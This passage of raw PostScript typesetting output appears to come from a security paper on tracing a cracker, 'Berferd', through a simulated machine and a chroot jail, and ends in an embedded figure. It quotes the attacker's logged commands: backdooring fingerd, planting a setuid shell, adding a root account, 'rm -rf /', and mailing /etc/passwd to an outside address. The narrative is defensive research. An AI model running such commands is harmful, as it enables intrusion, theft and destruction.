(214)g(Direct)h(comments)h(to)d(ftp-bugs@)q(ine)q(t.)150 2298
y(Jan)h(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(------->)g(QUIT\303M)150
2337 y(Jan)e(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(<---)e(221)g(Goodbye.)
150 2377 y(Jan)g(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(Logout,)f(status)g
(0)150 2416 y(Jan)f(20)f(23:37:31)j(inet)e(inetd[116])q(:)i(exit)e(14437)150
2456 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(finger)47
b(request)25 b(from)47 b(36.92.0.2)q(05)h(pid)24 b(14454)150
2495 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(exit)e(14454)150
2574 y(23:38)114 b(finger)25 b(attempt)g(on)f(berferd)150 2613
y(23:48)114 b(echo)24 b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q
(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s.)q(eq)q(uiv)150 2653
y(23:53)114 b(mv)23 b(/usr/etc)q(/f)q(ing)q(er)q(d)i(/usr/etc)q(/f)q(ing)q
(er)q(d.)q(b)374 2692 y(cp)e(/bin/sh)j(/usr/etc/f)q(in)q(ge)q(rd)p
eop
%%Page: 7 7
bop 0 42 a Ff(Decision)10 b(4)g(dictates)h(that)f(the)g(last)g(line)g(must)g
(fail.)16 b(Therefore,)11 b(he)g(just)f(broke)g(the)g Fe(\256nger)h
Ff(service)g(on)f(my)h(simulated)f(machine.)16 b(I)0 91 y(turned)9
b(of)o(f)h(the)h(real)f(service.)150 180 y Fb(23:57)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 219 y(23:58)114 b(cp)23 b(/bin/csh)j(/usr/etc/)q(fi)q(ng)q
(erd)0 318 y Fe(Csh)10 b Ff(wasn')o(t)g(in)g Fe(/bin)f Ff(either)n(,)i(so)f
(that)f(command)j(\252failed.\272)150 414 y Fb(00:07)114 b(cp)23
b(/usr/etc)q(/f)q(ing)q(er)q(d.b)j(/usr/etc)q(/fi)q(ng)q(er)q(d)0
521 y Ff(OK.)11 b Fe(Finger)n(d)f Ff(worked)g(again.)15 b(Nice)c(of)f
(Berferd)g(to)g(clean)h(up.)150 609 y Fb(00:14)114 b(passwd)25
b(bfrt)374 649 y(bfrt)374 688 y(bfrt)0 787 y Ff(Now)12 b(he)g(was)g(trying)e
(to)i(change)g(the)g(password.)20 b(This)11 b(would)g(never)h(work,)g(since)h
Fe(passwd)e Ff(reads)h(its)f(input)g(from)g Fc(/dev/tty)p Ff(,)0
837 y(not)e(the)i(shell)e(script)h(that)g Fe(sendmail)f Ff(would)g(create.)
150 925 y Fb(00:16)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 965
y(00:17)114 b(echo)24 b("/bin/sh)q(")h(>)e(/tmp/She)q(ll)374
1004 y(chmod)i(755)e(/tmp/she)q(ll)374 1044 y(chmod)i(755)e(/tmp/She)q(ll)150
1083 y(00:19)114 b(chmod)25 b(4755)f(/tmp/shell)150 1123 y(00:19)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q
(St)q(anf)q(or)q(d.)q(EDU)150 1162 y(00:19)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 1201 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
1241 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)0 1340
y Ff(At)10 b(this)g(point)f(I)h(was)h(tired.)16 b(CNN)10 b(had)g(nothing)f
(interesting)g(to)h(report)f(from)i(the)f(Middle)g(East.)16
b(I)11 b(wanted)f(to)g(continue)g(watching)0 1389 y(Berferd)i(in)f(the)g
(morning,)h(but)e(I)i(had)g(to)f(shut)g(down)g(my)h(simulated)f(machine)i
(until)d(then.)19 b(I)11 b(was)i(wondering)d(how)h(much)i(ef)o(fort)0
1439 y(this)d(was)i(worth.)k(Clif)o(f)9 b(Stoll)h(had)h(done)g(a)g(\256ne)g
(job)f(before[2])h(and)g(it)f(wasn')o(t)h(very)g(interesting)e(doing)h(it)g
(over)g(again.)18 b(It)10 b(was)i(fun)0 1489 y(to)g(lead)h(this)f(guy)g(on,)h
(but)f(what')n(s)g(the)g(goal?)23 b(I)12 b(did)g(want)g(to)g(keep)i(him)e
(busy)g(so)h(that)f(someone)h(at)g(Stanford)f(could)g(trace)h(him,)0
1539 y(but)c(they)h(wouldn')o(t)f(be)i(in)e(until)g(the)h(morning.)k(I)c
(could)g(just)f(shut)h(down)g(the)g(gateway)h(overnight:)h(it)e(is)g(a)h
(research)h(machine,)f(not)0 1589 y(production.)20 b(I)13 b(shut)f(down)g
(the)g(gateway)h(after)g(sending)f(out)g(a)h(complaint)f(about)g(possible)g
(disk)g(errors.)22 b(I)13 b(made)g(sure)g(Berferd)0 1639 y(was)e(sitting)d
(in)i(one)g(of)g(those)g Fe(sleep)p Ff(s)h(in)f(the)g(login)e(when)j(the)f
(message)i(went)e(out.)0 1706 y(I)h(decided)h(I)f(would)f(like)h(to)f(have)i
(Berferd)f(spend)g(more)h(time)f(trying)f(to)g(get)i(in)e(than)h(I)g(spent)g
(leading)g(him)g(on.)18 b(\(In)10 b(the)h(long)g(run)0 1756
y(he)g(won)g(that)g(battle.\))17 b(After)11 b(half)f(an)i(hour)e(I)h
(concluded)g(that)g(this)f(creep)i(wasn')o(t)f(worth)f(holding)g(up)g(a)i
(night')n(s)d(worth)h(of)h(mail.)18 b(I)0 1806 y(brought)9
b(the)h(machine)h(back)f(up,)h(and)f(went)g(to)g(sleep.)0 1874
y(Berferd)j(returned)f(an)h(hour)f(later)n(.)22 b(Of)13 b(course,)h(the)e
(magic)i(went)e(away)i(when)e(I)h(went)g(to)f(bed,)h(but)f(that)g(didn')o(t)g
(seem)i(to)e(bother)0 1923 y(him.)j(He)10 b(was)h(hooked.)j(He)c(continued)f
(his)g(attack)h(at)g(00:40.)k(The)c(logs)f(of)h(his)f(attempts)h(were)g
(tedious)f(until)f(this)h(command)h(was)0 1973 y(submitted)f(for)h
Fe(r)n(oot)g Ff(to)g(execute:)150 2062 y Fb(01:55)114 b(rm)23
b(-rf)h(/&)0 2160 y Fg(WHOA!)11 b Ff(Now)g(it)f(was)h(personal!)17
b(Obviously)9 b(the)h(machine')n(s)i(state)f(was)h(confusing)d(him,)i(and)g
(he)h(wanted)e(to)h(cover)g(his)f(tracks.)0 2210 y(Some)15
b(crackers)h(defend)f(their)f(work,)h(stating)e(that)h(they)g(don')o(t)g(do)g
(any)h(real)g(damage.)29 b(Our)14 b(cracker)i(tried)e(this)g(with)f(us,)j
(and)0 2260 y(succeeded)c(with)d(this)g(command)j(on)d(other)h(systems.)0
2328 y(He)h(worked)f(for)f(a)i(few)g(more)g(minutes,)f(and)g(gave)h(up)f
(until)e(morning.)150 2416 y Fb(07:12)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
2456 y(07:14)114 b(rm)23 b(-rf)h(/&)150 2495 y(07:17)114 b(finger)25
b(attempt)g(on)f(berferd)150 2535 y(07:19)114 b(/bin/rm)25
b(-rf)f(/&)374 2574 y(/bin/rm)h(-rf)f(/&)150 2613 y(07:23)114
b(/bin/rm)25 b(-rf)f(/&)150 2653 y(07:25)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
2692 y(09:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)p eop
%%Page: 8 8
bop 0 42 a Fg(4.)21 b(The)10 b(day)g(after)83 137 y Ff(It)h(was)i(time)f(to)f
(catch)i(up)f(with)e(all)i(the)g(commands)h(he)f(had)g(tried)f(after)h(I)g
(went)g(to)f(sleep,)j(including)c(those)h(three)h(attempts)0
187 y(to)g(erase)h(all)f(our)f(\256les.)21 b(T)m(o)13 b(simulate)f(the)g
(nasty)f Fe(rm)i Ff(command,)g(I)f(took)f(the)h(machine)h(down)f(for)f(a)i
(little)d(while,)j(cleaned)g(up)e(the)0 237 y(simulated)e(password)h(\256le,)
g(and)f(left)g(a)i(message)g(from)e(our)g(hapless)h(system)g(administrator)e
(in)h Fc(/etc/motd)g Ff(about)g(a)h(disk)f(crash.)0 287 y(My)h(log)f(showed)i
(the)f(rest)g(of)g(the)g(queued)g(commands:)150 377 y Fb(mail)24
b(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d(/etc/pass)q(wd)
150 416 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d
(/etc/host)q(s)150 456 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q
(d.e)q(du)i(<)d(/etc/inet)q(d.)q(con)q(f)150 495 y(ps)g(-aux|mai)q(l)i
(adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q(ed)q(u)150
535 y(ps)e(-aux|mai)q(l)i(adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q
(ed)q(u)150 574 y(mail)f(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q
(du)i(<)d(/etc/inet)q(d.)q(con)q(f)0 675 y Ff(I)14 b(mailed)g(him)g(the)g
(four)f(simulated)h(\256les,)i(including)c(the)i(huge)g(and)g(useless)h
Fc(/etc/hosts)e Ff(\256le.)27 b(I)14 b(even)g(mailed)h(him)e(error)0
725 y(messages)f(for)e(the)g(two)g Fe(ps)g Ff(commands)h(in)f(direct)g
(violation)e(of)i(the)g(no-errors)f(Decision)h(6.)0 793 y(In)g(the)g
(afternoon)g(he)g(was)h(still)e(there,)h(mistyping)f(away:)150
883 y Fb(13:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150 923 y(13:41)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q
(nf)q(ord)q(.E)q(DU)150 962 y(14:05)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150
1001 y(16:07)114 b(echo)24 b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h
(>>)e(/etc/o\303Hpa)q(ss)q(wd)150 1041 y(16:08)114 b(echo)24
b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h(>>)e(/etc/passw)q(d)0
1142 y Ff(He)15 b(worked)e(for)h(another)g(hour)f(that)h(afternoon,)h(and)f
(from)g(time-to-time)f(over)h(the)g(next)f(week)i(or)f(so.)27
b(I)14 b(went)g(to)g(the)g(Dallas)0 1192 y(\252CNN\272)e(Usenix,)g(where)g
(his)g(commands)g(were)h(simulated)e(from)g(the)h(terminal)f(room)g(about)g
(twice)h(a)g(day)m(.)20 b(This)11 b(response)h(time)0 1241
y(was)f(stretching)e(credibility)m(,)g(but)g(his)h(faith)f(seemed)j
(un\257agging.)0 1374 y Fg(5.)21 b(The)10 b(Jail)83 1470 y
Ff(I)h(never)g(intended)e(to)h(use)h(these)h(tools)d(to)h(simulate)h(a)g
(system)g(in)f(real-time.)16 b(I)11 b(wanted)g(to)f(watch)g(the)h(cracker)r
(')n(s)g(keystrokes,)0 1520 y(to)e(trace)i(him,)f(learn)g(his)f(techniques,)h
(and)g(warn)g(his)g(victims.)k(The)d(best)f(solution)d(was)k(to)e(lure)h(him)
f(to)h(a)g(sacri\256cial)g(machine)h(and)0 1569 y(tap)h(the)g(connection.)21
b(The)12 b(Ethernet)g(is)g(easy)i(to)d(tap,)i(and)f(modi\256ed)g
Fe(tcpdump)g Ff(software)g(can)h(separate)g(and)f(store)g(the)h(sessions.)0
1619 y(But)d(I)h(didn')o(t)f(have)h(a)h(spare)g(machine)f(handy)m(,)h(so)f(I)
g(took)f(the)h(software)g(route.)17 b(\(Steve)11 b(Bellovin)f(did)g
(construct)g(such)h(a)h(machine.)0 1669 y(W)m(e)f(never)f(managed)h(to)f
(lure)g(anyone)g(interesting)f(to)h(it.\))0 1737 y(I)g(consulted)f(the)g
(local)h(gurus)f(about)g(the)g(security)h(of)f(a)h Fe(chr)n(oot)g
Ff(environment.)k(Their)c(conclusion:)j(it)c(is)g(not)g(perfectly)h(secure,)h
(but)0 1787 y(if)d(compilers)h(and)g(certain)f(programs)h(are)h(missing,)e
(it)g(is)h(very)g(dif)o(\256cult)e(to)h(escape.)17 b(It)8 b(is)h(also)f(not)g
(undetectable,)i(but)e(I)g(\256gured)h(that)0 1836 y(Berferd)i(was)g(always)g
(in)f(a)h(hurry)m(,)g(and)f(probably)g(wouldn')o(t)f(notice.)16
b(W)m(e)11 b(constructed)f(such)h(a)g Fe(chr)n(oot)f Ff(\252Jail\272)i(\(or)e
(\252roach)h(motel\272\))0 1886 y(and)g(rigged)e(up)i(logged)e(connections)h
(to)g(it)g(through)f(our)h(\256rewall)h(machine)g(\(see)g(Figure)g(1\).)k
(Accounts)c Fe(berfer)n(d)g Ff(and)g Fe(guest)f Ff(were)0 1936
y(connected)i(to)g(the)f(Jail)h(through)e(this)h(arrangement.)21
b(T)m(wo)13 b(logs)e(were)i(kept)e(per)h(session,)h(one)f(each)h(for)f(input)
e(and)i(output.)18 b(The)0 1986 y(logs)10 b(were)h(labeled)f(with)f(starting)
g(and)h(ending)g(times.)0 2053 y(The)j(Jail)f(was)i(hard)e(to)g(set)h(up.)21
b(W)m(e)13 b(had)g(to)f(get)g(the)g(access)j(times)e(in)e Fc(/dev)i
Ff(right)e(and)h(update)h Fc(utmp)f Ff(for)g(Jail)g(users.)23
b(Several)0 2103 y(raw)13 b(disk)f(\256les)i(were)f(too)f(dangerous)h(to)f
(leave)i(around.)23 b(W)m(e)13 b(removed)g Fe(ps)p Ff(,)h Fe(who)p
Ff(,)f Fe(w)p Ff(,)h Fe(netstat)p Ff(,)f(and)g(other)f(revealing)h(programs.)
0 2153 y(The)e(\252)p Fe(login)p Ff(\272)g(shell)f(script)g(had)h(to)f
(simulate)h Fe(login)e Ff(in)h(several)i(ways)f(\(see)h(Figure)e(2.\))17
b(Diana)11 b(D'Angelo)f(set)h(up)f(a)h(believable)g(\256le)0
2203 y(system)g(\(this)e(is)h Fe(very)i Ff(good)d(system)i(administration)d
(practice\))j(and)f(loaded)g(a)h(variety)e(of)h(silly)f(and)i(tempting)e
(\256les.)0 2271 y(A)k(little)e(later)h(Berferd)h(discovered)f(the)h(Jail)f
(and)h(rattled)f(around)g(in)g(it.)21 b(He)13 b(looked)f(for)g(a)i(number)e
(of)h(programs)f(that)g(we)h(later)0 2320 y(learned)f(contained)f(his)h
(favorite)e(security)i(holes.)19 b(T)m(o)12 b(us)g(the)f(Jail)h(was)g(not)f
(very)h(convincing,)f(but)g(Berferd)g(seemed)j(to)d(shrug)g(it)0
2370 y(of)o(f)f(as)h(part)f(of)g(the)g(strangeness)h(of)f(our)f(gateway)m(.)0
2503 y Fg(6.)21 b(T)m(racing)10 b(Berferd)83 2599 y Ff(Berferd)g(spent)h(a)g
(lot)e(of)h(time)h(in)f(our)g(Jail.)15 b(I)c(spent)f(a)h(lot)e(of)i(time)f
(talking)f(to)h(Stephen)g(Hansen)h(at)g(Stanford.)k(Stephen)10
b(spent)0 2648 y(a)g(lot)e(of)h(time)h(trying)d(to)i(get)g(a)h(trace.)16
b(Berferd)9 b(was)h(attacking)f(us)g(through)f(one)h(of)g(several)h(machines)
g(at)g(Stanford.)k(He)c(connected)p eop
%%Page: 9 9
bop 0 1020 a @beginspecial -40 @hoffset @setspecial
%%BeginDocument: jail.eps
/CanvasDict where not{/CanvasDict 250 dict def}{pop}ifelse
CanvasDict begin
systemdict/setpacking known{/origpack currentpacking def true setpacking}if
/bdf{bind def}bind def
/xdf{exch bind def}bdf
/min{2 copy gt{exch}if pop}bdf
/edf{exch def}bdf
/max{2 copy lt{exch}if pop}bdf
/cvmtx matrix def
/tpmx matrix def
/currot 0 def
/rotmtx matrix def
/origmtx matrix def
/cvangle{360 exch sub 90 add 360 mod}bdf
/setrot{/currot edf rotmtx currentmatrix pop 2 copy translate currot rotate neg exch neg exch translate}bdf
/endrot{rotmtx setmatrix}bdf
/i systemdict/image get def/T true def/F false def/dbg F def
/ncolors 0 def/st0 ()def/st1 ()def/proc0 {}def
/penh 1 def/penv 1 def/penv2 0 def/penh2 0 def/samplesize 0 def/width 0 def/height 0 def
/setcmykcolor where not{/setcmykcolor{/b edf 3{b add 1.0 exch sub 0.0 max 1.0 min 3 1 roll}repeat systemdict begin setrgbcolor end}bdf}{pop}ifelse
/doeoclip{closepath{eoclip}stopped{currentflat dup 2 mul setflat eoclip setflat}if}bdf
/SpaceExtra 0 def/LetterSpace 0 def/StringLength 0 def/NumSpaces 0 def/JustOffset 0 def
/f0/fill load def
/s0{1 setlinewidth cvmtx currentmatrix pop penh penv scale stroke cvmtx setmatrix}bdf
/f1{_bp _fp impat}def
/s1{cvmtx currentmatrix pop 1 setlinewidth penh penv scale
{strokepath}stopped{currentflat dup 2 mul setflat strokepath setflat}if 
_bp
cvmtx setmatrix _fp impat}def
/filltype 0 def
/stroketype 0 def
/f{filltype 0 eq{f0}{f1}ifelse}bdf
/s{stroketype 0 eq{s0}{s1}ifelse}bdf
/_fp{}def
/_bp{}def
/_fg 1 def
/_pg 0 def
/_bkg 1 def
/_frg 0 def
/_frgb 3 array def
/_frrgb [0 0 0] def
/_fcmyk 4 array def
/_frcmyk [0 0 0 1] def
/_prgb 3 array def
/_pcmyk 4 array def
/_bkrgb [1 1 1] def
/_bkcmyk [0 0 0 0] def
/fg{/_fg exch def /filltype 0 def/fills{_fg setgray}def}def
/frgb{_frgb astore pop /filltype 0 def/fills{_frgb aload pop setrgbcolor}def}def
/fcmyk{_fcmyk astore pop /filltype 0 def/fills{_fcmyk aload pop setcmykcolor}def}def
/pg{/_pg exch def /stroketype 0 def/pens{_pg setgray}def}def
/prgb{_prgb astore pop /stroketype 0 def/pens{_prgb aload pop setrgbcolor}def}def
/pcmyk{_pcmyk astore pop /stroketype 0 def/pens{_pcmyk aload pop setcmykcolor}def}def
/fpat{/fstr edf/filltype 1 def/fills{/patstr fstr def}bdf}bdf
/ppat{/sstr edf/stroketype 1 def/pens{/patstr sstr def}bdf}bdf
/bkg{ /_bkg exch def /_bp{gsave _bkg setgray fill grestore}def}def
/bkrgb{_bkrgb astore pop/_bp{gsave _bkrgb aload pop setrgbcolor fill grestore}def}def
/bkcmyk{_bkcmyk astore pop/_bp{gsave _bkcmyk aload pop setcmykcolor fill grestore}def}def
/frg{ /_frg exch def /_fp{_frg setgray}def}def
/frrgb{_frrgb astore pop/_fp{_frrgb aload pop setrgbcolor}def}def
/frcmyk{_frcmyk astore pop/_fp{_frcmyk aload pop setcmykcolor}def}def
/icomp{/ncolors edf
ncolors 1 gt{/proc0 edf
dup dup 0 get ncolors div cvi exch 0 3 -1 roll put
4 -1 roll ncolors div cvi 4 1 roll{proc0 dup/st0 edf
0 exch ncolors exch length
dup ncolors sub exch ncolors div cvi string/st1 edf
{dup 0 exch dup 1 exch
2 add{st0 exch get add}bind for
3 div ncolors 4 eq{exch dup 3 1 roll 3 add st0 exch get add 255 exch sub dup 0 lt{pop 0}if}if cvi
dup 255 gt{pop 255}if
exch ncolors div cvi exch
st1 3 1 roll put}bind for
st1}}if i}bdf
/ci
{/colorimage where
{pop false exch colorimage}
{icomp}
ifelse}bdf
/impat
{/cnt 0 def
/MySave save def
currot 0 ne{currot neg rotate}if
clip
flattenpath
pathbbox
3 -1 roll
8 div floor 8 mul dup/starty edf
sub abs 8 div ceiling 8 mul cvi/height edf
exch 8 div floor 8 mul dup/startx edf
sub abs 8 div ceiling 8 mul cvi/width edf
startx starty translate
width height scale
/height height 8 mul def
/st0 width string def
width height T [width 0 0 height neg 0 height]
{patstr
cnt 8 mod
get/st1 edf
0 1
st0 length 1 sub dup 0 le{pop 1}if
{st0 exch
st1
put}bind for/cnt cnt 1 add def
st0}bind
imagemask
MySave restore
newpath}bdf
/cm{/ncolors edf
translate
scale/height edf/colorimage where
{pop}
{ncolors mul}ifelse/width edf
/tbitstr width string def
width height 8 [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
ncolors
dup 3 eq {ci}{icomp}ifelse}bdf
/im{translate
scale
/height edf
/width edf
/tbitstr width 7 add 8 div cvi string def
width height 1 [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
i}bdf
/imk{/invFlag edf
translate
scale
/height edf
/width edf
/tbitstr width 7 add 8 div cvi string def
width height invFlag [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
imagemask}bdf
/BeginEPSF
{/MySave save def
/dict_count countdictstack def
/op_count count 1 sub def
userdict begin
/showpage {} def
0 setgray 0 setlinecap
1 setlinewidth 0 setlinejoin
10 setmiterlimit [] 0 setdash newpath
/languagelevel where
{pop languagelevel 1 ne{false setstrokeadjust false setoverprint}if}if
}bdf
/EndEPSF
{count op_count sub {pop}repeat
countdictstack dict_count sub {end}repeat
MySave restore}bdf
/rectpath {/cv_r edf/cv_b edf/cv_l edf/cv_t edf
cv_l cv_t moveto cv_r cv_t lineto cv_r cv_b lineto cv_l cv_b lineto cv_l cv_t lineto closepath}bdf
/setpen{/penh edf/penv edf/penv2 penv 2 div def/penh2 penh 2 div def}bdf
/dostroke{not 1 currentgray ne or {pens s}if}bdf
/dodashfill{not 1 currentgray ne or
{fills gsave f grestore gsave [] 0 setdash 
stroketype/stroketype filltype def
s/stroketype edf grestore}if}bdf
/dofill{not 1 currentgray ne or {fills f}if}bdf
/dofillsave{not 1 currentgray ne or {gsave fills f grestore}if}bdf
/doline{not 1 currentgray ne or {pens filltype/filltype stroketype def f/filltype edf}if}bdf
/spx{SpaceExtra 0 32 4 -1 roll widthshow}bdf
/lsx{SpaceExtra 0 32 LetterSpace 0 6 -1 roll awidthshow}bdf
/Rjust{stringwidth pop JustOffset exch sub /JustOffset edf}bdf
/Cjust{stringwidth pop 2 div JustOffset exch sub /JustOffset edf}bdf
/adjfit{stringwidth pop LetterSpace StringLength 1 sub mul add SpaceExtra NumSpaces mul add dup /pw edf JustOffset exch 
sub dup /wdif edf StringLength div LetterSpace add /LetterSpace edf}bdf
/ulb{currentpoint pop /underlinpt edf}bdf
/ule{gsave currentpoint newpath moveto currentfont dup /ft1 known{dup /ft1 get begin /FontMatrix get FontMatrix tpmx concatmatrix pop}
{begin FontMatrix tpmx copy pop}ifelse FontInfo begin UnderlinePosition UnderlineThickness end end dup tpmx
dtransform pop setlinewidth dup tpmx dtransform pop 0 exch rmoveto underlinpt currentpoint pop sub 0 rlineto stroke grestore}bdf
/fittext{ /SpaceExtra edf /LetterSpace edf /StringLength edf /NumSpaces edf /JustOffset edf not 1 currentgray ne or
{dup {ulb}if exch
dup adjfit
lsx {ule}if}{pop pop}ifelse}bdf
/cvRecFont{/encod edf FontDirectory 2 index known{cleartomark}{findfont dup length 1 add dict begin
{1 index/FID ne{def}{pop pop}ifelse}forall encod{/Encoding CVvec def}if
currentdict end definefont cleartomark}ifelse}bdf
/wrk1 ( ) def/wdict 16 dict def
/Work75 75 string def /Nmk{Work75 cvs dup}bdf /Npt{put cvn}bdf /dhOdh{Nmk 2 79 Npt}bdf /dhodh{Nmk 2 111 Npt}bdf	/dhSdh{Nmk 2 83 Npt}bdf
/sfWidth{gsave 0 0 moveto 0 0 lineto 0 0 lineto 0 0 lineto closepath clip stringwidth grestore}bdf
/MakOF{dup dhodh FontDirectory 1 index known{exch pop}{exch findfont dup length 1 add dict begin
{1 index/FID ne 2 index /UniqueID ne and{def}{pop pop}ifelse}forall
/PaintType 2 def
/StrokeWidth .24 1000 mul ftSize div dup 12 lt{pop 12}if def
dup currentdict end definefont pop}ifelse}bdf
/fts{dup/ftSize edf}def
/mkFT{/tempFT 11 dict def tempFT begin
/FontMatrix [1 0 0 1 0 0] def/FontType 3 def
FontDirectory 3 index get /Encoding get/Encoding exch def
/proc2 edf/ft2 exch findfont def/ft1 exch findfont def/FontBBox [0 0 1 1] def
/BuildChar{wdict begin/chr edf/ftdt edf/chrst wrk1 dup 0 chr put def ftdt/proc2 get exec end}def
end tempFT definefont pop}bdf
/OLFt{dup dhOdh FontDirectory 1 index known{exch pop}
{dup 3 -1 roll dup MakOF {outproc} mkFT}ifelse}bdf
/mshw{moveto show}bdf
/outproc{ftdt/ft1 get setfont gsave chrst sfWidth grestore setcharwidth dblsh}bdf
/dblsh{currentgray 1 setgray chrst 0 0 mshw setgray ftdt/ft2 get setfont chrst 0 0 mshw}bdf
/ShadChar{ftdt/ft1 get setfont gsave chrst sfWidth 1 index 0 ne{exch .05 add exch}if grestore setcharwidth
chrst .06 0 mshw 0 .05 translate dblsh}bdf
/ShFt{dup dhSdh FontDirectory 1 index known{exch pop}
{dup 3 -1 roll dup MakOF {ShadChar} mkFT}ifelse}bdf
/LswUnits{72 75 div dup scale}bdf
/erasefill{_bp}def
/CVvec 256 array def
/NUL/SOH/STX/ETX/EOT/ENQ/ACK/BEL/BS/HT/LF/VT/FF/CR/SO/SI/DLE/DC1/DC2/DC3/DC4/NAK/SYN/ETB/CAN/EM/SUB/ESC/FS/GS/RS/US
CVvec 0 32 getinterval astore pop
CVvec 32/Times-Roman findfont/Encoding get
32 96 getinterval putinterval CVvec dup 39/quotesingle put 96/grave put
/Adieresis/Aring/Ccedilla/Eacute/Ntilde/Odieresis/Udieresis/aacute
/agrave/acircumflex/adieresis/atilde/aring/ccedilla/eacute/egrave
/ecircumflex/edieresis/iacute/igrave/icircumflex/idieresis/ntilde/oacute
/ograve/ocircumflex/odieresis/otilde/uacute/ugrave/ucircumflex/udieresis
/dagger/degree/cent/sterling/section/bullet/paragraph/germandbls
/registered/copyright/trademark/acute/dieresis/notequal/AE/Oslash
/infinity/plusminus/lessequal/greaterequal/yen/mu/partialdiff/summation
/product/pi/integral/ordfeminine/ordmasculine/Omega/ae/oslash
/questiondown/exclamdown/logicalnot/radical/florin/approxequal/Delta/guillemotleft
/guillemotright/ellipsis/blank/Agrave/Atilde/Otilde/OE/oe
/endash/emdash/quotedblleft/quotedblright/quoteleft/quoteright/divide/lozenge
/ydieresis/Ydieresis/fraction/currency/guilsinglleft/guilsinglright/fi/fl
/daggerdbl/periodcentered/quotesinglbase/quotedblbase/perthousand/Acircumflex/Ecircumflex/Aacute
/Edieresis/Egrave/Iacute/Icircumflex/Idieresis/Igrave/Oacute/Ocircumflex
/apple/Ograve/Uacute/Ucircumflex/Ugrave/dotlessi/circumflex/tilde
/macron/breve/dotaccent/ring/cedilla/hungarumlaut/ogonek/caron
CVvec 128 128 getinterval astore pop
end
CanvasDict begin
0 setlinecap
0 setlinejoin
4 setmiterlimit
/currot 0 def
origmtx currentmatrix pop
[] 0 setdash
1 1 setpen
1 fg
0 pg
0 frg
1 bkg
newpath
/dbg F def
2 2 setpen
240.5000 124.5000 2 305.1923 rectpath
F dofillsave
F dostroke
91.1667 151.5000 20 271.9615 rectpath
F dofillsave
F dostroke
save
0 setgray
14 fts /Courier findfont exch scalefont setfont
0 setgray
168 113 moveto
(SETUPSUCKER)
F F 88 0 11 0 0 fittext
restore
save
0 setgray
14 fts /Courier findfont exch scalefont setfont
0 setgray
174 149 moveto
(CALLSUCKER)
F F 80 0 10 0 0 fittext
restore
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
199 56 moveto
(JAIL)
F F 28 0 4 0 0 fittext
restore
save
0 setgray
18 fts /Courier findfont exch scalefont setfont
0 setgray
173 206 moveto
(GATEWAY)
F F 77 0 7 0 0 fittext
0 setgray
173 188 moveto
(MACHINE)
F F 77 0 7 0 0 fittext
restore
218 328.5000 29 445.5000 rectpath
F dofillsave
F dostroke
save
0 setgray
18 fts /Courier findfont exch scalefont setfont
0 setgray
345 196 moveto
(FIREWALL)
F F 88 0 8 0 0 fittext
restore
413.5000 82 moveto
413.5000 77.0632 403.3421 73 391 73 curveto
378.6579 73 368.5000 77.0632 368.5000 82 curveto
368.5000 86.9368 378.6579 91 391 91 curveto
403.3421 91 413.5000 86.9368 413.5000 82 curveto
closepath
F dofillsave
F dostroke
413.5000 82 moveto
413.5000 77.0632 401.3105 73 386.5000 73 curveto
371.6895 73 359.5000 77.0632 359.5000 82 curveto
359.5000 86.9368 371.6895 91 386.5000 91 curveto
401.3105 91 413.5000 86.9368 413.5000 82 curveto
closepath
F dofillsave
F dostroke
414 49 moveto
413.9957 48.7731 lineto
413.9616 48.3197 lineto
413.8935 47.8672 lineto
413.7914 47.4160 lineto
413.6554 46.9668 lineto
413.4858 46.5201 lineto
413.2824 46.0758 lineto
413.0461 45.6356 lineto
412.7768 45.1995 lineto
412.4749 44.7681 lineto
412.1406 44.3416 lineto
411.7741 43.9205 lineto
